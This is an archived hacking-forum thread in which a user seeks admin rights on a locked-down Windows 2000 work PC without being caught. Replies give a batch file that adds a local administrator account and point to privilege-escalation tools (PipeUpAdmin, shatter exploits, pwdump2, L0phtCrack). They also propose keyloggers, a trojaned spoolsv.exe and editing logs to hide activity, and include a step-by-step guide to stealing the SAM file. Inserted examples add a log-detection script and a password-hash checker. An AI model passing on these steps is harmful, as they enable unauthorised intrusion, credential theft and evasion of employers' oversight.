Getting Admin Status
puda
I've got a brand new PC here at work, and was obviously happy about it, until I found out about the new system restrictions that came with it.
I can't install new programs, access restricted web pages and so on.
My question is: is there any way I can do whatever the (filtered) I want and, most importantly, not get caught?
There isn't much to do here, so I'm always doing some freelance stuff, which sometimes requires me to install apps, use instant messengers and FTP.

*It is important for me that my boss or the network administrators don't see what I'm doing - it's a shitty job, but I need the fckng money.
Dillinja
What version of Windows are you using?

Thing is, if your network admin wanted to check for alterations, or even if it was just routine upgrading etc., it wouldn't be too difficult to see that you were messing about with the restrictions in place.

Is it worth losing your job over?
puda

Yes, I forgot to mention we're using Win2000 here.
And yes, it is pretty much worth the risk; I double my pay doing freelance work in my work hours.
About upgrades and stuff like that, I know when they're coming, so I can uninstall all the apps.
thewthrman
Google for polundo.exe (Policy Undo). I put it in my startup directory, but you can run it whenever you want to. I used to use a tool called getadmin a while back, but I don't know if it works for 2k/XP. Reset the admin password using the Linux boot disk. You'll have to Google for that one, too. I don't have access to it.
wh173r
Quick suggestion here: it is very much possible that you are already an administrator with network restrictions. So you can add your own admin account with the following batch file commands...

@echo off
rem Create a local account, then put it in the local Administrators group.
rem Each command's output is appended to a text file so the result can be read afterwards.
net user USER PASS /add >> see.txt
net localgroup Administrators USER /add >> ifworked.txt

Put that in Notepad, save it as NAME.BAT and then run it. Check see.txt and ifworked.txt to see if they say "The command completed successfully" or whatever.

This worked at my school, so I now admin the class when I want. Also, if you want to quit at any time, send your boss a net send message:

@echo off
net send PCNAME (filtered) you, this job blows and paid too little!
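The two net commands in the batch file above leave a paired trace in the Security log when account-management auditing is on (on Windows 2000/XP: event 624 "User Account Created", followed by event 636 "Security Enabled Local Group Member Added" naming Administrators), and that pair is exactly what an admin reviewing the box would look for. The following is an added example, not code from the post: a Python check over a constructed, simplified log export that pairs a 624 with a 636 into Administrators for the same new account within a short window. The pipe-delimited export layout, the WS01/jsmith names and every record in SAMPLE_LOG are assumptions made for the example; a real export carries more fields.

```python
"""Pair 'account created' with 'added to Administrators' in a Windows 2000/XP Security log.

Added example, not from the thread. 'net user X /add' logs event 624 (User Account
Created) and 'net localgroup Administrators X /add' logs event 636 (Security Enabled
Local Group Member Added) when account-management auditing is enabled. The export
format used here (time|event id|caller|account|group) and the records in SAMPLE_LOG
are constructed and simplified for the example.
"""
from datetime import datetime, timedelta

# Constructed sample export: one successful logon (528), the batch-file pair for
# USER, a service account created and put into a different group by an admin,
# and a helpdesk account promoted without a matching creation record.
SAMPLE_LOG = """\
2003-09-12 14:40:02|528|WS01\\jsmith|jsmith|
2003-09-12 14:44:10|624|WS01\\jsmith|USER|
2003-09-12 14:44:11|636|WS01\\jsmith|USER|Administrators
2003-09-12 16:10:00|624|DOMAIN\\itadmin|svc_backup|
2003-09-12 16:30:00|636|DOMAIN\\itadmin|svc_backup|Backup Operators
2003-09-13 09:00:00|636|DOMAIN\\itadmin|helpdesk2|Administrators
"""


def parse_export(text: str) -> list:
    """Turn the constructed export into dicts with a real datetime, sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        when, event_id, caller, account, group = line.split("|", 4)
        events.append({"time": datetime.strptime(when, "%Y-%m-%d %H:%M:%S"),
                       "id": int(event_id), "caller": caller,
                       "account": account, "group": group})
    return sorted(events, key=lambda e: e["time"])


def find_self_promotion(text: str, window_minutes: int = 10) -> list:
    """Report accounts created (624) and added to Administrators (636) within the window.

    A helpdesk account promoted without a creation record, or an account created and
    put into some other group, is not flagged; the batch-file pattern is one new account
    created and promoted seconds apart.
    """
    created = {}  # lowercase account name -> its 624 event
    hits = []
    for e in parse_export(text):
        if e["id"] == 624:
            created[e["account"].lower()] = e
        elif e["id"] == 636 and e["group"].lower() == "administrators":
            c = created.get(e["account"].lower())
            if c and e["time"] - c["time"] <= timedelta(minutes=window_minutes):
                hits.append({"account": e["account"], "created_by": c["caller"],
                             "promoted_by": e["caller"],
                             "seconds": int((e["time"] - c["time"]).total_seconds())})
    return hits


if __name__ == "__main__":
    for h in find_self_promotion(SAMPLE_LOG):
        print(f"{h['account']}: created by {h['created_by']}, made Administrator by "
              f"{h['promoted_by']} {h['seconds']}s later")
```

Run against the constructed export, only USER is reported: created by WS01\jsmith and put into Administrators by the same caller one second later, which is what running the batch file looks like from the admin's side of the log.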
Maximum
You could also try Getad.exe and Getad2.exe.
They use the shatter-type exploit on the NetDDE window to get administrative privs.

URL: http://imm.uinc.ru/getad/

-Maximum
mekros
Another one's PipeUpAdmin...
From maceo himself:
Windows 2000 uses predictable named pipe names for controlling services. Any user process can create a named pipe with the next name and force a service they can start to connect to the pipe. Once connected, the user process can impersonate the service, which in most cases runs in the SYSTEM account.

dogmile's gone now... but
here ya go...
puda
Thanks everyone for posting some suggestions.
I'll try them out tomorrow, then I'll let you know if I get fired or something.
MpR
New system? Ummm, nothing to lose. FORMAT and start fresh.
[Sunny]
OK, try this:

Download pwdump2 (www.packetstormsecurity.nl) and try to execute it with the following line (at your comp at work, of course):

pwdump2.exe > pw.txt. If it is successful you see in pw.txt your username and some others and the encrypted passwords. Copy the txt to a floppy and take it home. Download L0phtCrack 4 and crack/decrypt the passwords in pw.txt. Now you have the administrator pw and you can log in with his password (in most cases the admins use the same pw for every PC, stupid I know).

If pw.txt does not contain your username but an error message, then try PipeUpAdmin, as mentioned earlier; now you have system rights. Now do the thing with pwdump, and then set your account back to normal rights!!!!

For freelancing work just log in as admin. And think about the syslogs. They show at what time which user logged in etc... you have to edit them.

So have fun and never get caught ^^
thatsmej
If SP3 is not installed...
you can get yourself into an admin process...

It worked for me (local testing, of course).

Just search your exploit archives for the exploit that lets you change the process into a system/admin process.
puda

Well guys, I guess the restrictions are a bit too high over here; none of your tips worked. The net user command is disabled, pipeup gives error messages, pwdump won't work either.
Guess I'll just install a keylogger, call tech support, get the password and then try to change my account privileges. It's stupid, but I guess it'll work.
Anyway, thanks for posting your suggestions, I learned some stuff from them.
silos
Sorry, but how are you going to install a keylogger if you can't install anything?
thatsmej
QUOTE (puda @ Sep 12 2003, 02:44 PM)
Well guys, I guess the restrictions are a bit too high over here; none of your tips worked. The net user command is disabled, pipeup gives error messages, pwdump won't work either.
Guess I'll just install a keylogger, call tech support, get the password and then try to change my account privileges. It's stupid, but I guess it'll work.
Anyway, thanks for posting your suggestions, I learned some stuff from them.

Disabled as in net.exe is not there, or you get an error saying "access denied"?

Try this:
http://www.securityfocus.com/bid/4287

That's the exploit I was talking about.
krackatoa
If you have physical access, you own the machine. There are many Linux utils that allow you to reset passwords and the like. What works very simply is to boot into Linux or the Recovery Console. Replace spoolsv.exe with a trojaned version that creates an admin account. You have to rename spoolsv in the dllcache folder and any service pack folders at the same time, otherwise when you reboot Windows File Protection will kick in and delete your trojan.
Reboot; spoolsv.exe will run as SYSTEM and create your account.
Log in with your new account, kill your trojan, delete it, rename the original files back, restart spoolsv and you're done.

This works beautifully on domain controllers.

I'll post a trojan later when I have more time.
sub0
bump

New ideas/programs appreciated, since we at school have Win2000 systems now. I need to install some apps but I am not privileged.
nolimit
DebPloit/PipeUp are the easiest methods; since it's internal you can also try methods that would usually be blocked by a firewall (RPC, wks etc.). Shatter is probably your best bet though, because while Windows can patch the public methods used to create the shatter attack, they can't patch the real hole (kinda like RPC, but worse). So if you're real good you can create your own shatter attack and... *g* admin.
crypticcodez
I find the best way to get passwords is by using this interesting thing:
http://www.keyghost.com/hardware_keylogger.htm

They have more than one type out there; search around (Google).
Bwsk8
I've got the same problem and nothing is working, but I am being somewhat monitored (room full of people, and one admin sometimes looks over). Any help would be very much appreciated.

Edit: btw, I recently registered and can't post new topics. Why?

Edit: NM, I read the stickies a second ago. I just wanted to ask a question badly and couldn't find it asked on the forum already.
Bwsk8
QUOTE (wh173r @ Sep 10 2003, 06:34 PM)
@echo off
net send PCNAME (filtered) you, this job blows and paid too little!

Is there a way to net send without displaying the computer name it was sent from?
poostew
L0phtCrack is a pain in the butt. Go with Cain & Abel. It's free and just as good.

slimjim100
I would use Cain myself, but if you can't install software on the PC then just get a burned copy of Knoppix STD and run it from the CD. It has all the tools you will need to reset the admin password. You could also use ERD Commander and just use the Locksmith tool it has... So many ways to get into a box if you're on site. I have a USB flash drive with lots of bootable tools for just this kind of issue. Best of luck, and be careful not to get fired.

Slimjim100
skyvionics
How can I disable net.exe from running? There were a few people using the net command to create admin privileges and screwing up my PC. Is there any way to prevent it? I have admin privileges and we are using Windows XP and 2000, and I am still at the learning stage. Thanks in advance.
slimjim100
I think this was discussed before here http://www.governmentsecurity.org/forum/in...t=0&#entry36515

Good luck,

Slimjim100


omol
Hello, I would like to bring your attention to this little thing. It is a boot disk for NT, and since 2000 is based on an NT system it will work. It runs in a Linux shell and edits the SAM files before you log on. Reset the admin password to * and log in.

Link: http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html

Cheers then.
kingvandal
QUOTE
@echo off
net user USER PASS /add >> see.txt
net localgroup Administrators USER /add >> ifworked.txt


How do you make the output for ipconfig work?

ipconifg /all /add >>ip.txt

ipconfig /all >> ip.txt

ipconfig /add >> ip.txt


None work. What is missing?

Rich

::EDIT:: never mind. I will just use NETSTAT. A little bit more work than needed.
Working hard for what you want is not a bad thing.
yopman
Use spawn shell; it's for Win2000. W2k has as standard to use the scheduler with administrator rights. I hope I can help you.
TedOb1
To start a scheduled task in Win2k with admin rights you have to have the admin password. All the PipeUp tools have been fixed with SP2 or 3, although a shatter attack will still work. If you use Knoppix or something else to change your password you'll only change it on the local machine and not in AD, so you'll still be a regular user on the network.

If you have an AV on your machine, some of them with .chm help files allow you to open a browser page (by right-clicking on the title bar) that functions with system privileges, so you might be able to install proggies. But even if you can run apps as admin, some firewalls allow unrestricted web access by machine (IP & MAC); you're better off finding a proxy that's allowed, unless of course they use content blocking instead of just denying certain sites. Of course you can always break into an admin machine and install a proxy on it, if you're not afraid of losing your job and maybe getting arrested.
omol
Yeah, umm, look, you're changing the admin password before boot with a Unix shell (see above post) from a boot disk. I don't think Windows can protect against this! lol umm nahh Windows pks umm nahh! Like protecting against buffer overflows lol!
The_deViL
Got to thinking of a quick txt I wrote a long while ago; maybe it can help someone.

Personally I use "Windows XP/2000/NT Key" to set the admin password to 12345, then make it run pwdump instead of the logon screensaver, take the hash, crack it and reset it to the first password. No one knows anything, and you've got the admin pass.

-------------------------------------------

Obtaining the administrator password

By: Niklas / The_deViL. Contact me if you want anything. Please note that I am no expert of any kind.

(!) Note: I take no responsibility for what you might do, and I don't claim that this information is correct.
(!) Obtaining the administrator password in Windows NT/2k/XP: there are plenty of ways of doing this, and I will describe some different ways. Remember this is for educational purposes only. I am no expert in this, and I don't claim to be either, but this guide might help other people to learn.
(!) Note: Back up everything before you begin. Chances are you might destroy your computer. You have been warned. Okay? (!!) Note: I am on Win 2k. This article is written based on my knowledge.

Introduction

This article describes how to get hold of the administrator password on Windows NT/2k/XP. This is a rather simple article on password security. As stated above, I am on Windows 2000; I haven't tested these methods myself on other NT versions or XP.

The SAM File
The SAM file is (one of the locations) where the passwords (encrypted, of course) are stored. You can't just go to the dir and copy it; it is slightly more complicated than that.
(!) Note: On Win 2k or newer it (most likely) _will_ be SYSKEY encrypted. This means your favorite cracker won't break it. But there are other ways to get the non-SYSKEY-encrypted passwords. Check the section named Pwdump(2).

Directories where SAM is stored:
1. (The active SAM file) \"windows folder (winnt/windows)"\system32\config\
2. (The "repair" SAM file (used when creating a rescue/repair disc, I believe)) \"windows folder"\repair\

The SAM file is named SAM or SAM._ or similar.

(!) Note: The second SAM is most likely to be removed, since it is for the repair/rescue disc.
(!!) Note: The SAM file(s) are hidden. If you go through Windows you probably won't see them.

If you can see them, try to simply copy them. Since you probably are a regular user (otherwise you should go to the section "Pwdump") you cannot copy (probably you can't even see) the file. But that's okay.

So how do we get hold of the SAM file? You are going to need a boot disc (or boot CD). The boot disc for Windows 98 works great with some minor changes. If your computer is using NTFS (it probably does) you need a program called NTFSDOS. Do a search on Google for it.

Step-by-step:
1. Make a boot disc (I actually used a Windows 98 boot disc, made with a prog called win98se-bootfloppy.exe).
2. Copy the file NTFSDOS.exe to it. If you used the Win 98SE boot disc there is no space, so remove fdisk.exe since we don't need it.
3. Boot up the computer (you might need to change the boot order in the BIOS).
4. When you are in DOS, if the computer is using NTFS (not FAT32), run NTFSDOS.exe and it will say something similar to: NTFS partition mounted on X: (where X is the letter for the drive).
5. Go to the partition where your Windows installation is. If your partition is X:, simply write: x:
6. Go to your windows\system32\config directory. Copy the SAM._ file (might not be that file name). To list the files write 'dir' or 'dir/p' (without the ''). The syntax for copying a file to a: (you might need to insert a blank disc) is: copy filename a:
7. Open the SAM file in your favorite cracker, such as L0phtCrack.

Success (!?).

Pwdump(2)

Pwdump, or more exactly Pwdump2, is a great program. You see, the SAM file is SYSKEY encrypted, but Pwdump2 (written by Todd Sabin) pulls the password hash(es) out of OS memory: the non-SYSKEY-encrypted password hash(es). By using Pwdump2 you can get the non-SYSKEY-encrypted password file. You can then use your favorite cracker. But Pwdump requires admin rights to run.

Pwdump2 is best run from a command prompt (must be running as admin).

Step-by-step (if you've got administrator rights on the computer):
1. Download Pwdump2 (hint: www.google.com).
2. Start > Run > cmd. Go to the directory where you have pwdump2.exe and run the command: pwdump2 > password.txt
3. Simply import password.txt (contains the password hashes) into your favorite password cracker (in L0phtCrack that is Import > Import from PWDUMP file).

If you haven't got administrator rights: first of all you are going to download Pwdump2.zip (hint: www.google.com) and unpack it.

We must have a command prompt running as localhost (admin).
One way of doing this is replacing logon.scr with cmd.exe. Simply rename logon.scr to logonbak.scr and copy cmd.exe to logon.scr.
Then reboot your computer and when the login (or the press-Ctrl-Alt-Del-now) screen comes up, simply wait. It will take a while, anywhere between 5 and 25 minutes. Then Windows tries to run the default
logon screensaver (logon.scr) and instead runs the renamed cmd.exe as localhost (admin).

Then simply go to the directory where pwdump2 is and write: pwdump2 > password.txt. This extracts the non-SYSKEY-encrypted hashes from OS memory and saves them into password.txt. Then simply import password.txt (contains the password hashes) into your favorite password cracker (in L0phtCrack that is Import > Import from PWDUMP file).

Success (!?).
Resetting the administrator password.

There are different ways of doing this. You can use software called Windows XP/2000/NT Key. The plus with this program is that you can later on reset it back to its original settings. URL: http://www.lostpassword.com/ Another way is to use a different Windows boot loader. More information about this can be found on various sites on the net. I can't say I've got enough knowledge to write an article about this. Maybe later.

Conclusion

Hopefully you learned something from this article. That was why I wrote it.

Written by: Niklas
Nickname: The_deViL

Email:
Icq:

Contact me if you want anything. Please note that I am no expert of any kind. I simply want to share knowledge.
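[Sunny]'s post and the Pwdump(2) section above both stop at "import the pwdump file into your cracker". As an added example, not part of the thread or of The_deViL's text, here is what that step does, in Python: pwdump2 prints one line per account as user:RID:LM hash:NT hash:::, and the NT hash is MD4 over the UTF-16LE encoding of the password, so a candidate is tested by hashing it the same way and comparing with the stored value. MD4 is implemented inline in pure Python because current OpenSSL builds hide it behind the legacy provider. The dump in SAMPLE_DUMP is constructed (the Administrator and Guest lines carry the hashes of "password" and of an empty password; the worker line is a made-up value that no candidate matches), and all function and variable names are mine.

```python
"""Check candidate passwords against the NT hashes in pwdump2-style output.

Added example, not from the thread. MD4 is implemented here (RFC 1320) so the script
runs on builds where OpenSSL hides MD4 behind the legacy provider. SAMPLE_DUMP is a
constructed dump for this example.
"""
import struct

_MASK = 0xFFFFFFFF
_LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 over an arbitrary byte string; returns the 16-byte digest."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    k3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1: F, word order 0..15
            a, b, c, d = d, _rotl((a + f(b, c, d) + x[i]) & _MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: G, words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rotl((a + g(b, c, d) + x[k] + 0x5A827999) & _MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: H (xor), words 0,8,4,12,2,10,...
            a, b, c, d = d, _rotl((a + (b ^ c ^ d) + x[k3[i]] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4]), b, c
        h = [(v + w) & _MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), as lowercase hex; no salt, so a table lookup works."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str) -> list:
    """Parse 'user:rid:lmhash:nthash:::' lines; blank or malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        rows.append({"user": parts[0], "rid": int(parts[1]),
                     "lm": parts[2].lower(), "nt": parts[3].lower()})
    return rows


def has_lm_hash(row: dict) -> bool:
    """False when the LM field is the 'no LM hash' constant (blank password or LM storage off)."""
    return row["lm"] != _LM_EMPTY


def check_candidates(dump: str, candidates) -> dict:
    """Map each account name to the candidate whose NT hash equals its stored NT hash."""
    table = {nt_hash(p): p for p in candidates}
    return {r["user"]: table[r["nt"]] for r in parse_pwdump(dump) if r["nt"] in table}


# Constructed dump: Administrator has the LM and NT hashes of "password",
# Guest has a blank password, worker's hashes are made-up values.
SAMPLE_DUMP = """\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
worker:1004:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
"""

if __name__ == "__main__":
    for user, pw in check_candidates(SAMPLE_DUMP, ["password", "letmein", ""]).items():
        print(f"{user}: {pw!r}")
```

The check runs on the NT column on purpose: an LM field of aad3b435b51404eeaad3b435b51404ee means no LM hash is stored for that account (blank password, or LM hashes disabled), so an LM-only attack on such a dump finds nothing, while the NT hash is always present.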